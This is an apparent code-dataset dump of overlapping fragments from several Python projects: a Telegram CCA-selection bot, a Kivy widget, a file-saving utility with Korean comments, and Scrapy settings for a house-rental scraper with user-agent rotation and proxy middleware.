Please select one of your CCAs.\"", "= get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup =", "your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are", "Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def", "first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if is_registered(username): ccas =", "of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you", "contact your CCA Head to register you or /register here.') def back(update, context):", "context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name)", "Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else:", "get_user_ccas, is_registered, register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import", "keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi", "ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of your CCAs.\" %", "from spreadsheet.utility import get_user_ccas, is_registered, register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext", "conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for" ]
[ "<gh_stars>0 from kivy.uix.widget import Widget from kivy.uix.floatlayout import FloatLayout class RootWidget(FloatLayout): def __init__(self,", "kivy.uix.widget import Widget from kivy.uix.floatlayout import FloatLayout class RootWidget(FloatLayout): def __init__(self, **kwargs): super().__init__(**kwargs)", "from kivy.uix.widget import Widget from kivy.uix.floatlayout import FloatLayout class RootWidget(FloatLayout): def __init__(self, **kwargs):" ]
[ "__init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name,", "language) -> bool: basename = remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if", "'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self): return", "-> bool: basename = remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file):", "def mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError:", "encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname)", "FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는", "get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else: with open(file, 'w',", "from re import sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object):", "pathlib import Path from modules.languages import get_extension import os.path from re import sub", "os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param", "str): while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir,", "content, language) -> bool: basename = remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)])", "# 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' #", "def write_file(self, name, content, language) -> bool: basename = 
remove_win_special_char(name) file = self.dirname", "True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else:", "# print(f'이미 존재!: {basename}') return False else: with open(file, 'w', encoding='utf-8') as f:", "return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir)", "파일을 저장할 기본 디렉토리 save_cnt = 0 # 파일 저장 카운트 def __init__(self,", "mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool: basename = remove_win_special_char(name) file =", "if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def", "remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}')", "0 # 파일 저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir", "사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return", "self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool: basename =", "특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '',", "/ self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool: basename", "Path from modules.languages import get_extension import os.path from re import sub # 상위", "저장할 기본 디렉토리 save_cnt = 0 # 파일 저장 카운트 def __init__(self, *dirs):", "print(f'이미 존재!: {basename}') return False else: with open(file, 'w', encoding='utf-8') as f: f.write(content)", "# 파일을 저장할 기본 디렉토리 save_cnt = 0 # 파일 저장 카운트 def", "before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '', before_str) def 
get_file_dirname(file_path):", "저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname)", ":param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '', before_str) def", "/ ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else: with", "= '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt = 0 # 파일 저장", "return False else: with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1", "True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir)", "open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self):", "= self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False", "mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists(", "+= 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True:", "문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '', before_str) def get_file_dirname(file_path): return", "get_extension import os.path from re import sub # 상위 디렉토리 경로 BASE_DIR =", "get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is False:", ":return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '', before_str) def get_file_dirname(file_path): return os.path.dirname(os.path.abspath(file_path))", "FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt = 0 #", "디렉토리 save_cnt = 0 # 파일 저장 카운트 def __init__(self, *dirs): self.dirname =", "else: return def 
remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str:", "from pathlib import Path from modules.languages import get_extension import os.path from re import", "else: with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return True", "try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return", "''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else: with open(file,", "<reponame>leeyongjoo/algorithm-problem-automation<gh_stars>0 from pathlib import Path from modules.languages import get_extension import os.path from re", "re import sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir", "파일 저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs)", "존재!: {basename}') return False else: with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt", "카운트 def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def", "return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try: if", "= remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!:", "as f: f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def", "# 파일 저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir /", "import os.path from re import sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent", "file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') 
return", "기본 디렉토리 save_cnt = 0 # 파일 저장 카운트 def __init__(self, *dirs): self.dirname", "제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '', before_str)", "False else: with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return", "def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return:", "is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\"", "def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is", "basename = remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미", "{basename}') return False else: with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt +=", "os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else: with open(file, 'w', encoding='utf-8') as", "from modules.languages import get_extension import os.path from re import sub # 상위 디렉토리", "windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열", "\"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된", "import sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir =", "name, content, language) -> bool: basename = remove_win_special_char(name) file = self.dirname / ''.join([basename,", "= BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) ->", "BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool:", "def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir / 
'/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self,", "bool: basename = remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): #", "return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열", "1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try:", "while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir)))", "class FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt = 0", "self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language)", "'/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool: basename = remove_win_special_char(name) file", "= 0 # 파일 저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR /", "os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로", "save_cnt = 0 # 파일 저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR", "write_file(self, name, content, language) -> bool: basename = remove_win_special_char(name) file = self.dirname /", "modules.languages import get_extension import os.path from re import sub # 상위 디렉토리 경로", "except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지", "sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads'", "False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( 
os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서", "self.save_cnt += 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while", "import get_extension import os.path from re import sub # 상위 디렉토리 경로 BASE_DIR", "with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return True def", "경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본", "os.path from re import sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class", "os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except", "*dirs): self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content,", "remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가", "Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt =", "'_downloads' # 파일을 저장할 기본 디렉토리 save_cnt = 0 # 파일 저장 카운트", "f: f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir:", "BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본 디렉토리", "파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\"", "/ '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool: basename = remove_win_special_char(name)", "os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거", "상위 디렉토리 경로 BASE_DIR = 
Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을", "mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자", "self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else:", "= Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt", "못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]',", "import Path from modules.languages import get_extension import os.path from re import sub #", "os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str):", "default_dir = '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt = 0 # 파일", "if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else: with open(file, 'w', encoding='utf-8')", "디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을 저장할", "f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str):" ]
[ "9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET", "= { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE =", "Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR '", "case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number of requests", "'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727;", "AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0", "Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U;", "1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser;", "MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',", "'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200,", "WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X", "}, } # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [", "NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15", "Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT =", "(KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible;", "SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58':", "The initial download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay to", "to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 
10 # The", "300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200,", "'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True", "'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3)", "a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS =", "Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED =", "'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY", "1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0;", "Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 '", "9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;", "True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = {", "Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT", "ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port':", "CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept':", ".NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1;", "SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0", "CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1;", "Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; 
fr)", "5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0;", "CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)',", "{ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = {", "Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0',", "AUTOTHROTTLE_MAX_DELAY = 10 # The average number of requests Scrapy should be sending", "every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL", "USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko)", ".NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',", "Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1',", "'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline':", "False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False", "Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows", "Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287", "3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities,", "= 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel", "{ 
'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES", "MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center", "(KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20", "300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and", "lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map':", "(Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\", "Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686;", "ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' # 默认为", "9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR '", "NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN;", "NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322", "AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay to be set in case", "2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR", "-*- coding: utf-8 -*- from house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE", "DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS", ".NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 
5.1; zh-CN) AppleWebKit/523.15 (KHTML,", "OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY =", "'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware':", ".NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;", "(disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download", "Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168", "ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' #", "Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY", "CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows", "CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0;", "Media Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL", "for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3", "(Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20',", "3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE", "Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0", "like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US)", "= { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES =", "5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0;", "'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; 
en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0;", "8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET", "10 # The maximum download delay to be set in case of high", "' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko,", "CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U;", "high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number of requests Scrapy should", "like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215", "= True # Enable and configure the AutoThrottle extension (disabled by default) #", "= 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map,", "(Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows", "house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' 